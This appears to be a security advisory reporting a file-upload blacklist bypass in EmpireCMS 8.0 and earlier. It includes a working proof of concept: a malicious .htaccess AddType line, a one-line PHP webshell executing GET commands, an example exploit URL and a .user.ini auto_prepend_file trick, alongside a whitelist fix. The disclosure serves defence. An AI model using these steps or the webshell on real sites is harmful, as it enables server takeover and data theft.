EmpireCMS 8.0 Unrestricted Upload

Title: File Upload Blacklist Bypass Vulnerability in EmpireCMS ≤ 8.0#

BUG_Author: pemic、gets

Affected Version: EmpireCMS ≤ 8.0

Vendor: EmpireCMS Official

Software: EmpireCMS Download

Vulnerability File:

• e/class/connect.php

Description:#

A file upload restriction bypass vulnerability exists in EmpireCMS due to an incomplete blacklist implementation in the CheckSaveTranFiletype() function. The function fails to block dangerous file types including .htaccess and .user.ini, which can be leveraged to achieve Remote Code Execution (RCE) on Apache and Nginx servers respectively.

Vulnerability Analysis:#

Root Cause:

In file e/class/connect.php, lines 6554-6561, the CheckSaveTranFiletype() function implements a blacklist-based file type validation:

function CheckSaveTranFiletype($filetype){
    $savetranfiletype=',.php,.php3,.php4,.php5,.php6,.php7,.php8,.php9,.phar,.asp,.aspx,.jsp,.cgi,.phtml,.asa,.asax,.fcgi,.pl,.ascx,.ashx,.cer,.cdx,.pht,.shtml,.shtm,.stm,';
    if(stristr($savetranfiletype,','.$filetype.','))
    {
        return true;
    }
    return false;
}

Missing dangerous file types:

• .htaccess - Apache configuration file that can enable PHP execution for arbitrary extensions

• .user.ini - PHP configuration file for Nginx/PHP-FPM that can include malicious files

• .php. - Trailing dot bypass on Windows systems

• .php::$DATA - NTFS Alternate Data Stream bypass on Windows

Attack Vector:

An attacker with member privileges can:

1. Upload a .htaccess file to enable PHP execution for a custom extension (e.g., .jpg)

2. Upload a webshell with that extension (e.g., shell.jpg)

3. Access the webshell to execute arbitrary code

Proof of Concept:#

Test Environment:

• EmpireCMS Version: 8.0

• PHP Version: 5.6

• Apache Version: 2.4.25

• Apache AllowOverride: All

Step 1: Verify blacklist bypass

Execute the following test to confirm which file types bypass the blacklist:

<?php
define('InEmpireCMS', TRUE);
include('/path/to/e/class/connect.php');
​
$test_types = array('.php', '.htaccess', '.user.ini', '.php.');
foreach($test_types as $type) {
    $result = CheckSaveTranFiletype($type);
    echo $type . ': ' . ($result ? 'BLOCKED' : 'BYPASSED') . "\n";
}
?>

Result:

.php: BLOCKED
.htaccess: BYPASSED
.user.ini: BYPASSED
.php.: BYPASSED

Step 2: Exploitation scenario (Apache)

1. Register a member account on the target website

2. Create a malicious .htaccess file:

AddType application/x-httpd-php .jpg

3. Upload the .htaccess file through the member file upload function

4. Create a webshell named shell.jpg:

<?php system($_GET['cmd']); ?>

5. Upload shell.jpg to the same directory

6. Access the webshell:

http://target/d/file/2024/12-22/shell.jpg?cmd=whoami

Step 3: Exploitation scenario (Nginx with PHP-FPM)

1. Create a malicious .user.ini file:

auto_prepend_file=/tmp/shell.txt

2. Upload the .user.ini file

3. Upload a file containing PHP code to /tmp/shell.txt or use other means to create it

4. Any PHP file in the same directory will now execute the malicious code

Impact:#

An attacker with member-level access can:

• Execute arbitrary system commands on the server

• Read/write any files accessible to the web server user

• Compromise the entire server

• Access database credentials and sensitive data

Tested Bypass Extensions:#

Extension	Status	Attack Vector
.htaccess	BYPASSED	Apache AddType directive
.user.ini	BYPASSED	PHP auto_prepend_file
.php.	BYPASSED	Windows trailing dot
.php::$DATA	BYPASSED	Windows NTFS ADS

Suggested Fix:#

Replace blacklist validation with whitelist validation:

function CheckSaveTranFiletype($filetype){
    // Whitelist of allowed extensions
    $allowedTypes = array('.jpg', '.jpeg', '.png', '.gif', '.bmp', '.pdf', '.doc', '.docx', '.xls', '.xlsx', '.txt', '.zip', '.rar');
    
    $filetype = strtolower($filetype);
    if(in_array($filetype, $allowedTypes)){
        return false; // Allowed
    }
    return true; // Blocked
}

Additionally, add the following dangerous extensions to the current blacklist as a minimum fix:

$savetranfiletype=',.php,.php3,.php4,.php5,.php6,.php7,.php8,.php9,.phar,.asp,.aspx,.jsp,.cgi,.phtml,.asa,.asax,.fcgi,.pl,.ascx,.ashx,.cer,.cdx,.pht,.shtml,.shtm,.stm,.htaccess,.user.ini,';

Timeline:#

• 2025-12-22: Vulnerability discovered and verified

• 2025-12-22: Report submitted